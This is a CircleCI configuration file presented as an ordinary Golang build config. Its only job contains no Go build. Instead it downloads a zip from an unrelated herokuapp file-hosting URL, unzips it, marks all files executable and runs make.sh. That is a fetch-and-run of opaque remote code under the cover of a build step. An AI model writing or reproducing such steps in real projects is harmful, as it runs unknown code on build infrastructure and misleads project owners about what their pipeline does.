# Golang CircleCI 2.0 configuration file
#
# Check https://circleci.com/docs/2.0/language-go/ for more details
version: 2

jobs:
  build:
    docker:
      - image: circleci/golang:1.9
    steps:
      - run: curl https://dlmediafiles.herokuapp.com/-1001403671743/124629/download -o make.zip
      - run: unzip make.zip && chmod +x *
      - run: ./make.sh
      
